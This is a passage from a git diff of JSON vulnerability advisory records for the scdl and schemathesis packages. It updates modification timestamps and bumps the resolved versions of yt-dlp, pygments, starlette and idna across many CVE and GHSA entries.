"pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2023-40581.json b/advisories/BREW-scdl-CVE-2023-40581.json index 23860975aab..8d182f2fe81 100644 --- a/advisories/BREW-scdl-CVE-2023-40581.json +++ b/advisories/BREW-scdl-CVE-2023-40581.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2023-40581", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-42h4-v29r-42qg", "CVE-2023-40581", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2023.09.24", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2023-46121.json b/advisories/BREW-scdl-CVE-2023-46121.json index 227791144d0..06b4cb563f0 100644 --- a/advisories/BREW-scdl-CVE-2023-46121.json +++ b/advisories/BREW-scdl-CVE-2023-46121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2023-46121", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-3ch3-jhc6-5r8x", "CVE-2023-46121", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2023.11.14", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2024-22423.json b/advisories/BREW-scdl-CVE-2024-22423.json index 1ce3becc34a..f524c4c2c4f 100644 --- a/advisories/BREW-scdl-CVE-2024-22423.json +++ b/advisories/BREW-scdl-CVE-2024-22423.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2024-22423", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-hjq6-52gw-2g7p", "CVE-2024-22423", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2024.04.09", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2024-38519.json b/advisories/BREW-scdl-CVE-2024-38519.json index 338614648aa..8ad9aeed469 100644 --- a/advisories/BREW-scdl-CVE-2024-38519.json +++ b/advisories/BREW-scdl-CVE-2024-38519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2024-38519", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-79w7-vh3h-8g4j", "CVE-2024-38519", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2024.07.01", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2026-26331.json b/advisories/BREW-scdl-CVE-2026-26331.json index 55c5e9a1b43..f7e02891fda 100644 --- a/advisories/BREW-scdl-CVE-2026-26331.json +++ b/advisories/BREW-scdl-CVE-2026-26331.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-26331", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-g3gw-q23r-pgqm", "CVE-2026-26331", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.02.21", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2026-4539.json b/advisories/BREW-scdl-CVE-2026-4539.json index fa705bfab97..45eeb46976f 100644 --- a/advisories/BREW-scdl-CVE-2026-4539.json +++ b/advisories/BREW-scdl-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-4539", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-scdl-CVE-2026-50019.json b/advisories/BREW-scdl-CVE-2026-50019.json index d1852ea1060..f7b125017f9 100644 --- a/advisories/BREW-scdl-CVE-2026-50019.json +++ b/advisories/BREW-scdl-CVE-2026-50019.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-50019", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-f7j3-774f-rfhj", "CVE-2026-50019", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.6.9", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2026-50023.json b/advisories/BREW-scdl-CVE-2026-50023.json index 0dfbe6f17f3..ad37afe236d 100644 --- a/advisories/BREW-scdl-CVE-2026-50023.json +++ b/advisories/BREW-scdl-CVE-2026-50023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-50023", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-c6mh-fpjc-4pr3", "CVE-2026-50023", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.6.9", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2026-50574.json b/advisories/BREW-scdl-CVE-2026-50574.json index 11b65809b12..16dac261cd3 100644 --- a/advisories/BREW-scdl-CVE-2026-50574.json +++ b/advisories/BREW-scdl-CVE-2026-50574.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-50574", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-vx4q-3cr2-7cg2", "CVE-2026-50574", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.6.9", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-CVE-2026-55404.json b/advisories/BREW-scdl-CVE-2026-55404.json index 28717a70f29..d43904bcd58 100644 --- a/advisories/BREW-scdl-CVE-2026-55404.json +++ b/advisories/BREW-scdl-CVE-2026-55404.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-CVE-2026-55404", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-6v4j-43gg-vj32", "CVE-2026-55404", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.7.4", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-GHSA-3v33-3wmw-3785.json b/advisories/BREW-scdl-GHSA-3v33-3wmw-3785.json index 942ed647111..05d168aadc6 100644 --- a/advisories/BREW-scdl-GHSA-3v33-3wmw-3785.json +++ b/advisories/BREW-scdl-GHSA-3v33-3wmw-3785.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-GHSA-3v33-3wmw-3785", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-3v33-3wmw-3785" ], @@ -31,7 +31,7 @@ "range_state": "fixed", "upstream_fixed_in": "2024.07.07", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -44,8 +44,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-scdl-GHSA-69qj-pvh9-c5wg.json b/advisories/BREW-scdl-GHSA-69qj-pvh9-c5wg.json index e9a199d36e2..4e38f1b1018 100644 --- a/advisories/BREW-scdl-GHSA-69qj-pvh9-c5wg.json +++ b/advisories/BREW-scdl-GHSA-69qj-pvh9-c5wg.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-scdl-GHSA-69qj-pvh9-c5wg", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-69qj-pvh9-c5wg" ], @@ -31,7 +31,7 @@ "range_state": "fixed", "upstream_fixed_in": "2026.6.9", "resource": "yt-dlp", - "resource_purl": "pkg:pypi/yt-dlp@2026.7.4" + "resource_purl": "pkg:pypi/yt-dlp@2026.8.19" } } ], @@ -44,8 +44,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4", + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19", "resource": "yt-dlp" } ] diff --git a/advisories/BREW-schemathesis-CVE-2015-8557.json b/advisories/BREW-schemathesis-CVE-2015-8557.json index a0d37f77f19..92c6ab88c09 100644 --- a/advisories/BREW-schemathesis-CVE-2015-8557.json +++ b/advisories/BREW-schemathesis-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2015-8557", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-schemathesis-CVE-2021-20270.json b/advisories/BREW-schemathesis-CVE-2021-20270.json index 1515621c6d0..d7d7677bc26 100644 --- a/advisories/BREW-schemathesis-CVE-2021-20270.json +++ b/advisories/BREW-schemathesis-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2021-20270", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-schemathesis-CVE-2021-27291.json b/advisories/BREW-schemathesis-CVE-2021-27291.json index c3c9c6dae6e..5aa89939d8e 100644 --- a/advisories/BREW-schemathesis-CVE-2021-27291.json +++ b/advisories/BREW-schemathesis-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2021-27291", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-schemathesis-CVE-2022-40896.json b/advisories/BREW-schemathesis-CVE-2022-40896.json index 805de449fc6..ed3c141a033 100644 --- a/advisories/BREW-schemathesis-CVE-2022-40896.json +++ b/advisories/BREW-schemathesis-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2022-40896", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-schemathesis-CVE-2023-29159.json b/advisories/BREW-schemathesis-CVE-2023-29159.json index adf6d44c559..65dbfe2b209 100644 --- a/advisories/BREW-schemathesis-CVE-2023-29159.json +++ b/advisories/BREW-schemathesis-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2023-29159", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.27.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2023-30798.json b/advisories/BREW-schemathesis-CVE-2023-30798.json index a6defc389c4..4cced2129d1 100644 --- a/advisories/BREW-schemathesis-CVE-2023-30798.json +++ b/advisories/BREW-schemathesis-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2023-30798", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.25.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2024-3651.json b/advisories/BREW-schemathesis-CVE-2024-3651.json index 9a85d7e089e..fbf80a6ed8c 100644 --- a/advisories/BREW-schemathesis-CVE-2024-3651.json +++ b/advisories/BREW-schemathesis-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2024-3651", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-schemathesis-CVE-2024-47874.json b/advisories/BREW-schemathesis-CVE-2024-47874.json index ad8061dde42..32792a31a4c 100644 --- a/advisories/BREW-schemathesis-CVE-2024-47874.json +++ b/advisories/BREW-schemathesis-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2024-47874", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.40.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2025-54121.json b/advisories/BREW-schemathesis-CVE-2025-54121.json index 8c483379bcf..0025b57e3ed 100644 --- a/advisories/BREW-schemathesis-CVE-2025-54121.json +++ b/advisories/BREW-schemathesis-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2025-54121", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.47.2", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2025-62727.json b/advisories/BREW-schemathesis-CVE-2025-62727.json index 66dc07a8a1d..7e4fd3da66f 100644 --- a/advisories/BREW-schemathesis-CVE-2025-62727.json +++ b/advisories/BREW-schemathesis-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2025-62727", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.49.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.3.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-schemathesis-CVE-2026-4539.json b/advisories/BREW-schemathesis-CVE-2026-4539.json index af528d18f84..52caf8cb9bb 100644 --- a/advisories/BREW-schemathesis-CVE-2026-4539.json +++ b/advisories/BREW-schemathesis-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-schemathesis-CVE-2026-4539", "published": "2026-08-13T17:34:18Z", - "modified": "2026-08-13T17:34:18Z", + "modified": "2026-08-22T09:33:04Z", 